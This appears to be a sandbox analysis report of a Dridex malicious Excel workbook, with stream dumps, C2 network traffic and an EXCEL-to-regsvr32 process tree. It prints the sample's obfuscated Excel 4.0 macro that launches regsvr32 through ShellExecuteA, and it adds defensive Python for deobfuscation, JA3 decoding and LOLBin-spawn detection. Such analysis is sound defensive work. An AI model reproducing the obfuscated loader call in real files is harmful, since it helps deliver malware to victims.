Data Raw: | 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 4d 6f 64 75 6c 6f 31 00 4d 00 6f 00 64 00 75 00 6c 00 6f 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3535 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3535 |
Entropy: | 4.33045908783 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 847 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 847 |
Entropy: | 6.50704839241 |
Base64 Encoded: | True |
Data ASCII: | . K . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . H . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 4b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 48 c3 aa 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
"=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()
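The two lines above are the same Excel 4.0 formula: the first as the report renders it, the second as it sits in the cell, wrapped in an Excel string literal (so every embedded quote is doubled) and followed by =RETURN(). The strings are cut up and rejoined with & around the defined name U so that no cell holds "Shell32", "ShellExecuteA", "Open" or "regsvr32" as a literal. The Python below is an added example, not part of the report, that undoes the concatenation. It assumes U holds "e" (the only value that turns the fragments into valid Win32 names; the report does not show the name's value). y, if, B, D and F are names or cells whose values the report does not include, so they are left as <name> placeholders rather than guessed.

```python
"""Resolve Excel 4.0 (XLM) string-concatenation obfuscation of the kind
shown above: literals and defined names joined with '&' inside CALL()."""
import re

# Assumption, not from the report: the defined name U holds "e".
ASSUMED_NAMES = {"U": "e"}

# Constructed input: the two lines from the report, copied verbatim.
MACRO_LINE = ('CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, '
              '"Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)')
CELL_LINE = ('"=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", '
             '""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&""'
             ' ""&B&D&F,y,y)"=RETURN()')


def unwrap_cell_string(text):
    """A formula stored as a string literal has its quotes doubled. Strip a
    trailing =RETURN(), the outer quotes, undouble, and drop the leading '='."""
    text = text.strip()
    if text.endswith("=RETURN()"):
        text = text[: -len("=RETURN()")].rstrip()
    if len(text) >= 2 and text[0] == '"' and text[-1] == '"':
        text = text[1:-1].replace('""', '"')
    return text.lstrip("=")


def _split_top_level(s, sep=","):
    """Split on sep at parenthesis depth 0 and outside string literals."""
    parts, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(s):
        c = s[i]
        if in_str:
            if c == '"' and i + 1 < len(s) and s[i + 1] == '"':
                cur.append('""')          # escaped quote inside a literal
                i += 2
                continue
            if c == '"':
                in_str = False
            cur.append(c)
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c == sep and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            depth += (c == "(") - (c == ")")
            cur.append(c)
        i += 1
    parts.append("".join(cur))
    return parts


def resolve_concat(expr, names):
    """Evaluate a chain of literals and names joined by '&'. Unknown names
    are kept as <name> placeholders instead of being guessed."""
    out = []
    for piece in _split_top_level(expr, "&"):
        piece = piece.strip()
        if len(piece) >= 2 and piece[0] == '"' and piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))
        elif piece in names:
            out.append(names[piece])
        else:
            out.append(f"<{piece}>")
    return "".join(out)


def deobfuscate_call(formula, names=ASSUMED_NAMES):
    """Return (function, [resolved args]) for a FUNC(arg, arg, ...) formula,
    accepting either the plain or the cell-string form."""
    formula = unwrap_cell_string(formula)
    m = re.fullmatch(r"\s*([A-Za-z_.]+)\s*\((.*)\)\s*", formula, re.S)
    if not m:
        raise ValueError("not a single function call: " + formula)
    func, body = m.group(1), m.group(2)
    return func, [resolve_concat(a, names) for a in _split_top_level(body)]


def describe_call(func, args):
    """For CALL(dll, export, types, params...): name the Win32 API invoked.
    The type string's first char is the return type, the rest the params."""
    if func.upper() == "CALL" and len(args) >= 3:
        return f"{args[0]}!{args[1]}({', '.join(repr(a) for a in args[3:])})"
    return f"{func}({', '.join(repr(a) for a in args)})"


if __name__ == "__main__":
    for line in (MACRO_LINE, CELL_LINE):
        print(describe_call(*deobfuscate_call(line)))
```

With U = "e" both lines resolve to Shell32!ShellExecuteA(<y>, 'Open', 'regsvr32', ' -<if> <B><D><F>', <y>, <y>): JJCCCCJ is the CALL return type (J, a long) followed by the six ShellExecuteA parameter types (hwnd, verb, file, parameters, directory, show). The regsvr32 argument string is assembled from other names and cells, which is why the fragment ends in identifiers rather than a path; the file that regsvr32 is told to load is not recoverable from this line alone.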
OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-11-24T09:53:01Z |
Last Saved Time: | 2020-11-24T11:16:24Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 112 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 112 |
Entropy: | 4.6011544911 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 54 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 54 |
Entropy: | 1.81172045559 |
Base64 Encoded: | False |
Data ASCII: | . . ( . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 28 00 06 0c 06 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2021 16:16:52.647237062 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.031683922 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.031779051 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.040821075 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.436954021 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.438813925 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.438882113 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.439016104 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.439035892 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.439099073 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.439116001 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.454781055 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.833894014 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.833924055 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.834187984 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.394364119 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.774748087 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779407978 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779485941 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779527903 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779566050 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779604912 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779633045 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.779691935 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780330896 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780371904 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780411959 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780435085 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780463934 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780538082 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780575037 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780606031 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780636072 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:00.778804064 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:00.778858900 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:00.778913975 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:00.778965950 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.458421946 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.458503962 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.839639902 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:51.839720964 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2021 16:16:52.568312883 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:52.629705906 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.171509981 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.221276999 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.235192060 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.282988071 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.821381092 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.878948927 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.891345978 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.941071987 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:52.568312883 CET | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:52.629705906 CET | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | | | 199.192.21.36 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:53.438882113 CET | 199.192.21.36 | 443 | 192.168.2.22 | 49167 | CN=bamoli.de | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | Sat Nov 28 07:26:47 CET 2020 | Fri Feb 26 07:26:47 CET 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
(same handshake, intermediate CA certificate) | | | | | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu Mar 17 17:40:46 CET 2016 | Wed Mar 17 17:40:46 CET 2021 | | |
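The JA3 SSL Client Fingerprint column is the raw JA3 string (TLS version, cipher suites, extensions, named groups and point formats, all as decimal IDs) and the Digest column is its MD5. The Python below is an added example, not part of the report, that decodes the five fields into names and recomputes the digest so it can be compared with the digest column above. The IANA number-to-name tables in it are deliberately limited to the IDs that occur in this fingerprint.

```python
"""Decode a JA3 client fingerprint string and recompute its digest
(JA3 digest = hex MD5 of the raw comma-separated JA3 string)."""
import hashlib

# Constructed input: the JA3 string from the HTTPS table, copied verbatim.
JA3_STRING = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-"
              "49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,"
              "0-10-11-13-23-65281,23-24,0")

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}
# IANA TLS ExtensionType values present in this fingerprint.
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              13: "signature_algorithms", 23: "extended_master_secret",
              65281: "renegotiation_info"}
# IANA TLS supported-group (named curve) IDs.
NAMED_GROUPS = {23: "secp256r1", 24: "secp384r1", 25: "secp521r1", 29: "x25519"}
# Suites worth flagging when a client still offers them (3DES, 64-bit block).
WEAK_SUITES = {0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
               0x0013: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"}


def _ints(field):
    """'a-b-c' -> [a, b, c]; an empty field (e.g. no extensions) -> []."""
    return [int(x) for x in field.split("-")] if field else []


def ja3_digest(ja3_string):
    """JA3 hashes the string exactly as shown, including the commas."""
    return hashlib.md5(ja3_string.encode("ascii")).hexdigest()


def decode_ja3(ja3_string):
    """Split the five JA3 fields and translate the numeric IDs to names."""
    version, ciphers, exts, groups, formats = ja3_string.split(",")
    cipher_ids = _ints(ciphers)
    return {
        "version": TLS_VERSIONS.get(int(version), version),
        "cipher_suites": [f"0x{c:04X}" for c in cipher_ids],
        "weak_suites": [WEAK_SUITES[c] for c in cipher_ids if c in WEAK_SUITES],
        "extensions": [EXTENSIONS.get(e, str(e)) for e in _ints(exts)],
        "groups": [NAMED_GROUPS.get(g, str(g)) for g in _ints(groups)],
        "point_formats": _ints(formats),
        "digest": ja3_digest(ja3_string),
    }


if __name__ == "__main__":
    for key, value in decode_ja3(JA3_STRING).items():
        print(f"{key}: {value}")
```

The offered list still contains the two 3DES suites (0x000A, 0x0013) and the extension set has neither ALPN (16) nor session_ticket (35), which is the profile of an older Schannel client. Since the only processes in this report are Office 2010 and regsvr32, the handshake comes from the Windows TLS stack on the analysis host: the JA3 identifies the client platform, not Dridex, and is context for the connection to 199.192.21.36 rather than a standalone indicator.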
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 16:16:40 |
Start date: | 26/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fcb0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:49 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:49 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:50 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
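The process list above shows EXCEL.EXE (Office 2010, 64-bit, running with administrator rights in the sandbox) starting regsvr32.exe three times within ten seconds of its own launch, with the command lines not captured. That parent/child relation is what the Sigma rule cited earlier in this report keys on. The Python below is an added example, not part of the report, that applies the same check to a constructed list of process-creation events modelled on the list above; the image paths and start times are taken from the report, while the PIDs and command lines are invented placeholders because the report does not show them.

```python
"""Flag Office applications spawning LOLBin children (the relation behind
"Microsoft Office Product Spawning Windows Shell") over process events."""
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe", "visio.exe"}
SUSPICIOUS_CHILDREN = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe",
                       "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe",
                       "bitsadmin.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (what Sysmon EID 1 or Windows 4688 give you)."""
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def _base(path):
    """'C:\\Windows\\System32\\regsvr32.exe' -> 'regsvr32.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawn_alerts(events):
    """One alert per child whose parent image is an Office application and
    whose own image is on the LOLBin list. Parents are resolved by PID, so
    events must be in creation order (parent before child). The command
    line is carried along but never matched on, because it may be empty."""
    by_pid, alerts = {}, []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        by_pid[ev.pid] = ev
        if (parent and _base(parent.image) in OFFICE_IMAGES
                and _base(ev.image) in SUSPICIOUS_CHILDREN):
            alerts.append({"ts": ev.ts, "parent": _base(parent.image),
                           "child": _base(ev.image), "pid": ev.pid,
                           "cmdline": ev.cmdline})
    return alerts


# Constructed events: paths and times from the report; PIDs and command
# lines are placeholders (the report leaves the command lines blank). The
# last event is a benign regsvr32 started from explorer.exe for contrast.
SAMPLE_EVENTS = [
    ProcEvent("16:16:40", 1000, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("16:16:40", 2044, 1000,
              r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              '"EXCEL.EXE" Dridex-06-bc1b.xlsm'),
    ProcEvent("16:16:49", 2188, 2044, r"C:\Windows\System32\regsvr32.exe", ""),
    ProcEvent("16:16:49", 2204, 2044, r"C:\Windows\System32\regsvr32.exe", ""),
    ProcEvent("16:16:50", 2220, 2044, r"C:\Windows\System32\regsvr32.exe", ""),
    ProcEvent("16:17:30", 2300, 1000, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s C:\placeholder\legit.dll"),
]


if __name__ == "__main__":
    for alert in office_spawn_alerts(SAMPLE_EVENTS):
        print(alert)
```

Because the match is on the parent image, the blank command lines in this report do not weaken the detection, and a regsvr32 started by explorer.exe with an ordinary DLL argument is not flagged. In a real pipeline the ParentImage field of Sysmon Event ID 1 (or the creator process of 4688) replaces the PID lookup.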
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: Foglio1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Foglio1" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Cells | |
Cells | |
SpecialCells | |
xlCellTypeConstants | |
Len | Len( |